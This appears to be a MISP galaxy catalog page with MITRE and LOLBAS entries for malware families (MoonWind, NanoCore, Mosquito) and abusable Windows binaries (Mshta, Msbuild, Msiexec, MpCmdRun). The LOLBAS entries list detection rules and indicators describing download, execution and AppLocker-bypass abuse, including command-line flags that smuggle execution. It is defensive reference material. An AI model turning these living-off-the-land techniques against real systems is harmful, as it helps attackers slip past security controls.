MoonWind is a remote access tool (RAT) that was used in 2016 to target organizations in Thailand. [Palo Alto MoonWind March 2017]
Internal MISP references
UUID a699f32f-6596-4060-8fcd-42587a844b80
which can be used as unique global reference for MoonWind
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0149 |
source | MITRE |
type | ['malware'] |
More_eggs
More_eggs is a JScript backdoor used by Cobalt Group and FIN6. Its name was given based on the variable "More_eggs" being present in its code. There are at least two different versions of the backdoor being used, version 2.0 and version 4.4. [Talos Cobalt Group July 2018][Security Intelligence More Eggs Aug 2019]
Internal MISP references
UUID 69f202e7-4bc9-4f4f-943f-330c053ae977
which can be used as unique global reference for More_eggs
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0284 |
source | MITRE |
tags | ['f8669b82-2194-49a9-8e20-92e7f9ab0a6f'] |
type | ['malware'] |
Related clusters
To see the related clusters, click here.
Mori
Mori is a backdoor that has been used by MuddyWater since at least January 2022.[DHS CISA AA22-055A MuddyWater February 2022][CYBERCOM Iranian Intel Cyber January 2022]
Internal MISP references
UUID 385e1eaf-9ba8-4381-981a-3c7af718a77d
which can be used as unique global reference for Mori
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S1047 |
source | MITRE |
type | ['malware'] |
Related clusters
To see the related clusters, click here.
Mosquito
Mosquito is a Win32 backdoor that has been used by Turla. Mosquito is made up of three parts: the installer, the launcher, and the backdoor. The main backdoor is called CommanderDLL and is launched by the loader program. [ESET Turla Mosquito Jan 2018]
Internal MISP references
UUID c3939dad-d728-4ddb-804e-cf1e3743a55d
which can be used as unique global reference for Mosquito
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0256 |
source | MITRE |
tags | ['f8669b82-2194-49a9-8e20-92e7f9ab0a6f'] |
type | ['malware'] |
Related clusters
To see the related clusters, click here.
MpCmdRun
This object contains information sourced from the Living Off The Land Binaries, Scripts and Libraries (LOLBAS) project, which is licensed under GNU General Public License v3.0.
Description: Binary part of Windows Defender. Used to manage settings in Windows Defender
Author: Oddvar Moe
Paths: * C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2008.4-0\MpCmdRun.exe * C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2008.7-0\MpCmdRun.exe * C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.2008.9-0\MpCmdRun.exe
Resources: * https://docs.microsoft.com/en-us/windows/security/threat-protection/microsoft-defender-antivirus/command-line-arguments-microsoft-defender-antivirus * https://twitter.com/mohammadaskar2/status/1301263551638761477 * https://twitter.com/Oddvarmoe/status/1301444858910052352 * https://twitter.com/NotMedic/status/1301506813242867720
Detection: * Sigma: win_susp_mpcmdrun_download.yml * Elastic: command_and_control_remote_file_copy_mpcmdrun.toml * IOC: MpCmdRun storing data into alternate data streams. * IOC: MpCmdRun retrieving a file from a remote machine or the internet that is not expected. * IOC: Monitor process creation for non-SYSTEM and non-LOCAL SERVICE accounts launching mpcmdrun.exe. * IOC: Monitor for the creation of %USERPROFILE%\AppData\Local\Temp\MpCmdRun.log * IOC: User Agent is "MpCommunication"[MpCmdRun.exe - LOLBAS Project]
Internal MISP references
UUID ec54a1e4-92d4-4503-a510-a18989f1f8f3
which can be used as unique global reference for MpCmdRun
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
owner | TidalCyberIan |
platforms | ['Windows'] |
software_attack_id | S5127 |
source | Tidal Cyber |
tags | ['303a3675-4855-4323-b042-95bb1d907cca', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207'] |
type | ['tool'] |
Msbuild
This object contains information sourced from the Living Off The Land Binaries, Scripts and Libraries (LOLBAS) project, which is licensed under GNU General Public License v3.0.
Description: Used to compile and execute code
Author: Oddvar Moe
Paths: * C:\Windows\Microsoft.NET\Framework\v2.0.50727\Msbuild.exe * C:\Windows\Microsoft.NET\Framework64\v2.0.50727\Msbuild.exe * C:\Windows\Microsoft.NET\Framework\v3.5\Msbuild.exe * C:\Windows\Microsoft.NET\Framework64\v3.5\Msbuild.exe * C:\Windows\Microsoft.NET\Framework\v4.0.30319\Msbuild.exe * C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Msbuild.exe * C:\Program Files (x86)\MSBuild\14.0\bin\MSBuild.exe
Resources: * https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1127/T1127.md * https://github.com/Cn33liz/MSBuildShell * https://pentestlab.blog/2017/05/29/applocker-bypass-msbuild/ * https://oddvar.moe/2017/12/13/applocker-case-study-how-insecure-is-it-really-part-1/ * https://gist.github.com/bohops/4ffc43a281e87d108875f07614324191 * https://github.com/LOLBAS-Project/LOLBAS/issues/165 * https://docs.microsoft.com/en-us/visualstudio/msbuild/msbuild-response-files * https://www.daveaglick.com/posts/msbuild-loggers-and-logging-events
Detection: * Sigma: file_event_win_shell_write_susp_directory.yml * Sigma: proc_creation_win_msbuild_susp_parent_process.yml * Sigma: net_connection_win_silenttrinity_stager_msbuild_activity.yml * Splunk: suspicious_msbuild_spawn.yml * Splunk: suspicious_msbuild_rename.yml * Splunk: msbuild_suspicious_spawned_by_script_process.yml * Elastic: defense_evasion_msbuild_beacon_sequence.toml * Elastic: defense_evasion_msbuild_making_network_connections.toml * Elastic: defense_evasion_execution_msbuild_started_by_script.toml * Elastic: defense_evasion_execution_msbuild_started_by_office_app.toml * Elastic: defense_evasion_execution_msbuild_started_renamed.toml * BlockRule: https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules * IOC: Msbuild.exe should not normally be executed on workstations[LOLBAS Msbuild]
Internal MISP references
UUID 1f500e4c-25a1-4570-a3ba-5c9cd463afde
which can be used as unique global reference for Msbuild
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
owner | TidalCyberIan |
platforms | ['Windows'] |
software_attack_id | S5128 |
source | Tidal Cyber |
tags | ['dfda978e-e0a0-4e1a-85c7-d9ab2cd7ccc5', '303a3675-4855-4323-b042-95bb1d907cca', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207'] |
type | ['tool'] |
Msconfig
This object contains information sourced from the Living Off The Land Binaries, Scripts and Libraries (LOLBAS) project, which is licensed under GNU General Public License v3.0.
Description: MSConfig is a troubleshooting tool which is used to temporarily disable or re-enable software, device drivers or Windows services that run during startup process to help the user determine the cause of a problem with Windows
Author: Oddvar Moe
Paths: * C:\Windows\System32\msconfig.exe
Resources: * https://twitter.com/pabraeken/status/991314564896690177
Detection: * Sigma: proc_creation_win_uac_bypass_msconfig_gui.yml * Sigma: file_event_win_uac_bypass_msconfig_gui.yml * IOC: mscfgtlc.xml changes in system32 folder[Msconfig.exe - LOLBAS Project]
Internal MISP references
UUID 90c6cc43-d9dd-436c-b7ee-ede979765bdf
which can be used as unique global reference for Msconfig
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
owner | TidalCyberIan |
platforms | ['Windows'] |
software_attack_id | S5129 |
source | Tidal Cyber |
tags | ['7e20fe4e-6883-457d-81f9-b4010e739f89', '303a3675-4855-4323-b042-95bb1d907cca', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207'] |
type | ['tool'] |
Msdeploy
This object contains information sourced from the Living Off The Land Binaries, Scripts and Libraries (LOLBAS) project, which is licensed under GNU General Public License v3.0.
Description: Microsoft tool used to deploy Web Applications.
Author: Oddvar Moe
Paths: * C:\Program Files (x86)\IIS\Microsoft Web Deploy V3\msdeploy.exe
Resources: * https://twitter.com/pabraeken/status/995837734379032576 * https://twitter.com/pabraeken/status/999090532839313408
Detection: * Sigma: proc_creation_win_lolbin_msdeploy.yml[Msdeploy.exe - LOLBAS Project]
Internal MISP references
UUID 175b32ed-bea6-491c-8aac-d088f642a6e1
which can be used as unique global reference for Msdeploy
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
owner | TidalCyberIan |
platforms | ['Windows'] |
software_attack_id | S5226 |
source | Tidal Cyber |
tags | ['11452158-b8d2-4a33-952a-8896f961a2f5', '303a3675-4855-4323-b042-95bb1d907cca', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207'] |
type | ['tool'] |
Msdt
This object contains information sourced from the Living Off The Land Binaries, Scripts and Libraries (LOLBAS) project, which is licensed under GNU General Public License v3.0.
Description: Microsoft diagnostics tool
Author: Oddvar Moe
Paths: * C:\Windows\System32\Msdt.exe * C:\Windows\SysWOW64\Msdt.exe
Resources: * https://web.archive.org/web/20160322142537/https://cybersyndicates.com/2015/10/a-no-bull-guide-to-malicious-windows-trouble-shooting-packs-and-application-whitelist-bypass/ * https://oddvar.moe/2017/12/21/applocker-case-study-how-insecure-is-it-really-part-2/ * https://twitter.com/harr0ey/status/991338229952598016 * https://twitter.com/nas_bench/status/1531944240271568896
Detection: * Sigma: proc_creation_win_lolbin_msdt_answer_file.yml * Sigma: proc_creation_win_msdt_arbitrary_command_execution.yml * Elastic: defense_evasion_network_connection_from_windows_binary.toml[Msdt.exe - LOLBAS Project]
Internal MISP references
UUID bc39280c-da92-4e78-ab37-7c54ff72a1ba
which can be used as unique global reference for Msdt
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
owner | TidalCyberIan |
platforms | ['Windows'] |
software_attack_id | S5130 |
source | Tidal Cyber |
tags | ['8c30b46b-3651-4ccd-9d91-34fe89bc6843', '303a3675-4855-4323-b042-95bb1d907cca', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207'] |
type | ['tool'] |
Msedge
This object contains information sourced from the Living Off The Land Binaries, Scripts and Libraries (LOLBAS) project, which is licensed under GNU General Public License v3.0.
Description: Microsoft Edge browser
Author: mr.d0x
Paths: * c:\Program Files\Microsoft\Edge\Application\msedge.exe * c:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
Resources: * https://twitter.com/mrd0x/status/1478116126005641220 * https://twitter.com/mrd0x/status/1478234484881436672
Detection: * Sigma: proc_creation_win_browsers_msedge_arbitrary_download.yml * Sigma: proc_creation_win_browsers_chromium_headless_file_download.yml[Msedge.exe - LOLBAS Project]
Internal MISP references
UUID d64d75ba-1722-4a39-ab7f-d46c5d5815ec
which can be used as unique global reference for Msedge
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
owner | TidalCyberIan |
platforms | ['Windows'] |
software_attack_id | S5131 |
source | Tidal Cyber |
tags | ['5bd3af6b-cb96-4d96-9576-26521dd76513', '303a3675-4855-4323-b042-95bb1d907cca', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207'] |
type | ['tool'] |
msedge_proxy
This object contains information sourced from the Living Off The Land Binaries, Scripts and Libraries (LOLBAS) project, which is licensed under GNU General Public License v3.0.
Description: Microsoft Edge Browser
Author: Mert Daş
Paths: * C:\Program Files (x86)\Microsoft\Edge\Application\msedge_proxy.exe
Resources: None Provided
Detection: None Provided[msedge_proxy.exe - LOLBAS Project]
Internal MISP references
UUID e098413e-1d54-4d1f-bf63-1443b57bcc2f
which can be used as unique global reference for msedge_proxy
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
owner | TidalCyberIan |
platforms | ['Windows'] |
software_attack_id | S5182 |
source | Tidal Cyber |
tags | ['303a3675-4855-4323-b042-95bb1d907cca', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207'] |
type | ['tool'] |
msedgewebview2
This object contains information sourced from the Living Off The Land Binaries, Scripts and Libraries (LOLBAS) project, which is licensed under GNU General Public License v3.0.
Description: msedgewebview2.exe is the executable file for Microsoft Edge WebView2, which is a web browser control used by applications to display web content.
Author: Matan Bahar
Paths: * C:\Program Files (x86)\Microsoft\Edge\Application\114.0.1823.43\msedgewebview2.exe
Resources: * https://medium.com/@MalFuzzer/one-electron-to-rule-them-all-dc2e9b263daf
Detection: * IOC: msedgewebview2.exe spawned with any of the following: --gpu-launcher, --utility-cmd-prefix, --renderer-cmd-prefix, --browser-subprocess-path[msedgewebview2.exe - LOLBAS Project]
Internal MISP references
UUID ac6d4ab8-f34c-4b00-a943-cc2749b28a05
which can be used as unique global reference for msedgewebview2
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
owner | TidalCyberIan |
platforms | ['Windows'] |
software_attack_id | S5183 |
source | Tidal Cyber |
tags | ['303a3675-4855-4323-b042-95bb1d907cca', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207'] |
type | ['tool'] |
Mshta
This object contains information sourced from the Living Off The Land Binaries, Scripts and Libraries (LOLBAS) project, which is licensed under GNU General Public License v3.0.
Description: Used by Windows to execute html applications. (.hta)
Author: Oddvar Moe
Paths: * C:\Windows\System32\mshta.exe * C:\Windows\SysWOW64\mshta.exe
Resources: * https://evi1cg.me/archives/AppLocker_Bypass_Techniques.html#menu_index_4 * https://github.com/redcanaryco/atomic-red-team/blob/master/Windows/Payloads/mshta.sct * https://oddvar.moe/2017/12/21/applocker-case-study-how-insecure-is-it-really-part-2/ * https://oddvar.moe/2018/01/14/putting-data-in-alternate-data-streams-and-how-to-execute-it/
Detection: * Sigma: proc_creation_win_mshta_susp_pattern.yml * Sigma: proc_creation_win_hktl_invoke_obfuscation_via_use_mhsta.yml * Sigma: proc_creation_win_mshta_lethalhta_technique.yml * Sigma: proc_creation_win_mshta_javascript.yml * Sigma: file_event_win_net_cli_artefact.yml * Sigma: image_load_susp_script_dotnet_clr_dll_load.yml * Elastic: defense_evasion_mshta_beacon.toml * Elastic: lateral_movement_dcom_hta.toml * Elastic: defense_evasion_suspicious_managedcode_host_process.toml * Splunk: suspicious_mshta_activity.yml * Splunk: detect_mshta_renamed.yml * Splunk: suspicious_mshta_spawn.yml * Splunk: suspicious_mshta_child_process.yml * Splunk: detect_mshta_url_in_command_line.yml * BlockRule: https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules * IOC: mshta.exe executing raw or obfuscated script within the command-line * IOC: General usage of HTA file * IOC: msthta.exe network connection to Internet/WWW resource * IOC: DotNet CLR libraries loaded into mshta.exe * IOC: DotNet CLR Usage Log - mshta.exe.log[LOLBAS Mshta]
Internal MISP references
UUID f552a5a4-49dd-4ba6-9916-e631df4d4457
which can be used as unique global reference for Mshta
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
owner | TidalCyberIan |
platforms | ['Windows'] |
software_attack_id | S5132 |
source | Tidal Cyber |
tags | ['d819ae1a-e385-49fd-88d5-f66660729ecb', 'e551ae97-d1b4-484e-9267-89f33829ec2c', '15787198-6c8b-4f79-bf50-258d55072fee', 'e1af18e3-3224-4e4c-9d0f-533768474508', 'fe0e2dd3-962e-41a3-9850-cea146b1301f', '303a3675-4855-4323-b042-95bb1d907cca', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207'] |
type | ['tool'] |
Related clusters
To see the related clusters, click here.
Mshtml
This object contains information sourced from the Living Off The Land Binaries, Scripts and Libraries (LOLBAS) project, which is licensed under GNU General Public License v3.0.
Description: Microsoft HTML Viewer
Author: LOLBAS Team
Paths: * c:\windows\system32\mshtml.dll * c:\windows\syswow64\mshtml.dll
Resources: * https://twitter.com/pabraeken/status/998567549670477824 * https://windows10dll.nirsoft.net/mshtml_dll.html
Detection: * Sigma: proc_creation_win_rundll32_susp_activity.yml[Mshtml.dll - LOLBAS Project]
Internal MISP references
UUID f94674b9-f924-4452-8516-49657ed40032
which can be used as unique global reference for Mshtml
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
owner | TidalCyberIan |
platforms | ['Windows'] |
software_attack_id | S5192 |
source | Tidal Cyber |
tags | ['46338353-52ee-4f8d-9f18-f1b32644dd76', '303a3675-4855-4323-b042-95bb1d907cca', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207'] |
type | ['tool'] |
Msiexec
This object contains information sourced from the Living Off The Land Binaries, Scripts and Libraries (LOLBAS) project, which is licensed under GNU General Public License v3.0.
Description: Used by Windows to execute msi files
Author: Oddvar Moe
Paths: * C:\Windows\System32\msiexec.exe * C:\Windows\SysWOW64\msiexec.exe
Resources: * https://pentestlab.blog/2017/06/16/applocker-bypass-msiexec/ * https://twitter.com/PhilipTsukerman/status/992021361106268161 * https://badoption.eu/blog/2023/10/03/MSIFortune.html
Detection: * Sigma: proc_creation_win_msiexec_web_install.yml * Sigma: proc_creation_win_msiexec_masquerading.yml * Elastic: defense_evasion_network_connection_from_windows_binary.toml * Splunk: uninstall_app_using_msiexec.yml * IOC: msiexec.exe retrieving files from Internet[LOLBAS Msiexec]
Internal MISP references
UUID 9d00d3c4-9a01-403a-9275-c94960fd871f
which can be used as unique global reference for Msiexec
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
owner | TidalCyberIan |
platforms | ['Windows'] |
software_attack_id | S5133 |
source | Tidal Cyber |
tags | ['e1af18e3-3224-4e4c-9d0f-533768474508', 'fc2bbc6f-da5c-4afd-ae27-2fadf77c3bc4', '303a3675-4855-4323-b042-95bb1d907cca', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207'] |
type | ['tool'] |
Related clusters
To see the related clusters, click here.
MsoHtmEd
This object contains information sourced from the Living Off The Land Binaries, Scripts and Libraries (LOLBAS) project, which is licensed under GNU General Public License v3.0.
Description: Microsoft Office component
Author: Nir Chako
Paths: * C:\Program Files (x86)\Microsoft Office 16\ClientX86\Root\Office16\MSOHTMED.exe * C:\Program Files\Microsoft Office 16\ClientX64\Root\Office16\MSOHTMED.exe * C:\Program Files (x86)\Microsoft Office\Office16\MSOHTMED.exe * C:\Program Files\Microsoft Office\Office16\MSOHTMED.exe * C:\Program Files (x86)\Microsoft Office 15\ClientX86\Root\Office15\MSOHTMED.exe * C:\Program Files\Microsoft Office 15\ClientX64\Root\Office15\MSOHTMED.exe * C:\Program Files (x86)\Microsoft Office\Office15\MSOHTMED.exe * C:\Program Files\Microsoft Office\Office15\MSOHTMED.exe * C:\Program Files (x86)\Microsoft Office 14\ClientX86\Root\Office14\MSOHTMED.exe * C:\Program Files\Microsoft Office 14\ClientX64\Root\Office14\MSOHTMED.exe * C:\Program Files (x86)\Microsoft Office\Office14\MSOHTMED.exe * C:\Program Files\Microsoft Office\Office14\MSOHTMED.exe * C:\Program Files (x86)\Microsoft Office\Office12\MSOHTMED.exe * C:\Program Files\Microsoft Office\Office12\MSOHTMED.exe * C:\Program Files\Microsoft Office\Office12\MSOHTMED.exe
Resources: None Provided
Detection: * Sigma: proc_creation_win_lolbin_msohtmed_download.yml * IOC: Suspicious Office application internet/network traffic[MsoHtmEd.exe - LOLBAS Project]
Internal MISP references
UUID d316ab94-0420-4356-a3bb-f92f42a4247c
which can be used as unique global reference for MsoHtmEd
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
owner | TidalCyberIan |
platforms | ['Windows'] |
software_attack_id | S5227 |
source | Tidal Cyber |
tags | ['874c053b-d6b8-42c2-accc-cd256bb4d350', '303a3675-4855-4323-b042-95bb1d907cca', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207'] |
type | ['tool'] |
Mspub
This object contains information sourced from the Living Off The Land Binaries, Scripts and Libraries (LOLBAS) project, which is licensed under GNU General Public License v3.0.
Description: Microsoft Publisher
Author: Nir Chako
Paths: * C:\Program Files (x86)\Microsoft Office 16\ClientX86\Root\Office16\MSPUB.exe * C:\Program Files\Microsoft Office 16\ClientX64\Root\Office16\MSPUB.exe * C:\Program Files (x86)\Microsoft Office\Office16\MSPUB.exe * C:\Program Files\Microsoft Office\Office16\MSPUB.exe * C:\Program Files (x86)\Microsoft Office 15\ClientX86\Root\Office15\MSPUB.exe * C:\Program Files\Microsoft Office 15\ClientX64\Root\Office15\MSPUB.exe * C:\Program Files (x86)\Microsoft Office\Office15\MSPUB.exe * C:\Program Files\Microsoft Office\Office15\MSPUB.exe * C:\Program Files (x86)\Microsoft Office 14\ClientX86\Root\Office14\MSPUB.exe * C:\Program Files\Microsoft Office 14\ClientX64\Root\Office14\MSPUB.exe * C:\Program Files (x86)\Microsoft Office\Office14\MSPUB.exe * C:\Program Files\Microsoft Office\Office14\MSPUB.exe
Resources: None Provided
Detection: * Sigma: proc_creation_win_lolbin_mspub_download.yml * IOC: Suspicious Office application internet/network traffic[Mspub.exe - LOLBAS Project]
Internal MISP references
UUID c07f48ee-4667-4dd3-aa8e-cb6d588c547c
which can be used as unique global reference for Mspub
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
owner | TidalCyberIan |
platforms | ['Windows'] |
software_attack_id | S5228 |
source | Tidal Cyber |
tags | ['a523dcb0-9181-4170-a113-126df84594ca', '303a3675-4855-4323-b042-95bb1d907cca', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207'] |
type | ['tool'] |
msxsl
This object contains information sourced from the Living Off The Land Binaries, Scripts and Libraries (LOLBAS) project, which is licensed under GNU General Public License v3.0.
Description: Command line utility used to perform XSL transformations.
Author: Oddvar Moe
Paths: * no default
Resources: * https://twitter.com/subTee/status/877616321747271680 * https://github.com/3gstudent/Use-msxsl-to-bypass-AppLocker * https://github.com/RonnieSalomonsen/Use-msxsl-to-download-file
Detection: * Sigma: proc_creation_win_wmic_xsl_script_processing.yml * Elastic: defense_evasion_msxsl_beacon.toml * Elastic: defense_evasion_msxsl_network.toml * Elastic: defense_evasion_network_connection_from_windows_binary.toml[msxsl.exe - LOLBAS Project]
Internal MISP references
UUID 8cccbfed-3f78-45fd-b5d1-efe884d28f09
which can be used as unique global reference for msxsl
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
owner | TidalCyberIan |
platforms | ['Windows'] |
software_attack_id | S5229 |
source | Tidal Cyber |
tags | ['303a3675-4855-4323-b042-95bb1d907cca', '509a90c7-9ca9-4b23-bca2-cd38ef6a6207'] |
type | ['tool'] |
Related clusters
To see the related clusters, click here.
MURKYTOP
MURKYTOP is a reconnaissance tool used by Leviathan. [FireEye Periscope March 2018]
Internal MISP references
UUID 768111f9-0948-474b-82a6-cd5455079513
which can be used as unique global reference for MURKYTOP
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0233 |
source | MITRE |
type | ['malware'] |
Related clusters
To see the related clusters, click here.
Mythic
Mythic is an open source, cross-platform post-exploitation/command and control platform. Mythic is designed to "plug-n-play" with various agents and communication channels.[Mythic Github][Mythic SpecterOps][Mythc Documentation] Deployed Mythic C2 servers have been observed as part of potentially malicious infrastructure.[RecordedFuture 2021 Ad Infra]
Internal MISP references
UUID f1398367-a0af-4a89-b240-50cae4985ed9
which can be used as unique global reference for Mythic
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['macOS', 'Linux', 'Windows'] |
software_attack_id | S0699 |
source | MITRE |
tags | ['ed2b3f47-3e07-4019-a9bf-ec9d87f28c96', 'e81ba503-60b0-4b64-8f20-ef93e7783796'] |
type | ['tool'] |
Naid
Naid is a trojan used by Elderwood to open a backdoor on compromised hosts. [Symantec Elderwood Sept 2012] [Symantec Naid June 2012]
Internal MISP references
UUID 5cfd6135-c53b-4234-a17e-759494b2101f
which can be used as unique global reference for Naid
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0205 |
source | MITRE |
tags | ['84615fe0-c2a5-4e07-8957-78ebc29b4635'] |
type | ['malware'] |
Related clusters
To see the related clusters, click here.
NanHaiShu
NanHaiShu is a remote access tool and JScript backdoor used by Leviathan. NanHaiShu has been used to target government and private-sector organizations that have relations to the South China Sea dispute. [Proofpoint Leviathan Oct 2017] [fsecure NanHaiShu July 2016]
Internal MISP references
UUID 0e28dfc9-8948-4c08-b7d8-9e80e19cc464
which can be used as unique global reference for NanHaiShu
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0228 |
source | MITRE |
type | ['malware'] |
Related clusters
To see the related clusters, click here.
NanoCore
NanoCore is a modular remote access tool developed in .NET that can be used to spy on victims and steal information. It has been used by threat actors since 2013.[DigiTrust NanoCore Jan 2017][Cofense NanoCore Mar 2018][PaloAlto NanoCore Feb 2016][Unit 42 Gorgon Group Aug 2018]
Internal MISP references
UUID db05dbaa-eb3a-4303-b37e-18d67e7e85a1
which can be used as unique global reference for NanoCore
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0336 |
source | MITRE |
tags | ['4d767e87-4cf6-438a-927a-43d2d0beaab7', 'f8669b82-2194-49a9-8e20-92e7f9ab0a6f'] |
type | ['malware'] |
Related clusters
To see the related clusters, click here.
NativeZone
NativeZone is the name given collectively to disposable custom Cobalt Strike loaders used by APT29 since at least 2021.[MSTIC Nobelium Toolset May 2021][SentinelOne NobleBaron June 2021]
Internal MISP references
UUID a814fd1d-8c2c-41b3-bb3a-30c4318c74c0
which can be used as unique global reference for NativeZone
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0637 |
source | MITRE |
tags | ['84615fe0-c2a5-4e07-8957-78ebc29b4635'] |
type | ['malware'] |
Related clusters
To see the related clusters, click here.
NavRAT
NavRAT is a remote access tool designed to upload, download, and execute files. It has been observed in attacks targeting South Korea. [Talos NavRAT May 2018]
Internal MISP references
UUID b410d30c-4db6-4239-950e-9b0e0521f0d2
which can be used as unique global reference for NavRAT
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0247 |
source | MITRE |
tags | ['16b47583-1c54-431f-9f09-759df7b5ddb7'] |
type | ['malware'] |
Related clusters
To see the related clusters, click here.
NBTscan
NBTscan is an open source tool that has been used by state groups to conduct internal reconnaissance within a compromised network.[Debian nbtscan Nov 2019][SecTools nbtscan June 2003][Symantec Waterbug Jun 2019][FireEye APT39 Jan 2019]
Internal MISP references
UUID 950f13e6-3ae3-411e-a2b2-4ba1afe6cb76
which can be used as unique global reference for NBTscan
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['macOS', 'Linux', 'Windows'] |
software_attack_id | S0590 |
source | MITRE |
type | ['tool'] |
Related clusters
To see the related clusters, click here.
nbtstat
nbtstat is a utility used to troubleshoot NetBIOS name resolution. [TechNet Nbtstat]
Internal MISP references
UUID 81c2fc9b-8c2c-40f6-a327-dcdd64b70a7e
which can be used as unique global reference for nbtstat
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
software_attack_id | S0102 |
source | MITRE |
type | ['tool'] |
Related clusters
To see the related clusters, click here.
NDiskMonitor
NDiskMonitor is a custom backdoor written in .NET that appears to be unique to Patchwork. [TrendMicro Patchwork Dec 2017]
Internal MISP references
UUID 6d42e6c5-3056-4ff1-8d5d-a736807ec84c
which can be used as unique global reference for NDiskMonitor
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0272 |
source | MITRE |
type | ['malware'] |
Related clusters
To see the related clusters, click here.
Nebulae
Nebulae Is a backdoor that has been used by Naikon since at least 2020.[Bitdefender Naikon April 2021]
Internal MISP references
UUID 38510bab-aece-4d7b-b621-7594c2c4fe14
which can be used as unique global reference for Nebulae
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0630 |
source | MITRE |
type | ['malware'] |
Related clusters
To see the related clusters, click here.
Neoichor
Neoichor is C2 malware used by Ke3chang since at least 2019; similar malware families used by the group include Leeson and Numbldea.[Microsoft NICKEL December 2021]
Internal MISP references
UUID 8662e29e-5766-4311-894e-5ca52515ccbe
which can be used as unique global reference for Neoichor
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0691 |
source | MITRE |
tags | ['f8669b82-2194-49a9-8e20-92e7f9ab0a6f'] |
type | ['malware'] |
Related clusters
To see the related clusters, click here.
Nerex
Nerex is a Trojan used by Elderwood to open a backdoor on compromised hosts. [Symantec Elderwood Sept 2012] [Symantec Nerex May 2012]
Internal MISP references
UUID de8b18c9-ebab-4126-96a9-282fa8829877
which can be used as unique global reference for Nerex
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0210 |
source | MITRE |
type | ['malware'] |
Related clusters
To see the related clusters, click here.
Net
The Net utility is a component of the Windows operating system. It is used in command-line operations for control of users, groups, services, and network connections. [Microsoft Net Utility]
Net has a great deal of functionality, [Savill 1999] much of which is useful for an adversary, such as gathering system and network information for Discovery, moving laterally through SMB/Windows Admin Shares using net use
commands, and interacting with services. The net1.exe utility is executed for certain functionality when net.exe is run and can be used directly in commands such as net1 user
.
Internal MISP references
UUID c9b8522f-126d-40ff-b44e-1f46098bd8cc
which can be used as unique global reference for Net
in MISP communities and other software using the MISP galaxy
Associated metadata
Metadata key | Value |
---|---|
platforms | ['Windows'] |
software_attack_id | S0039 |
source | MITRE |
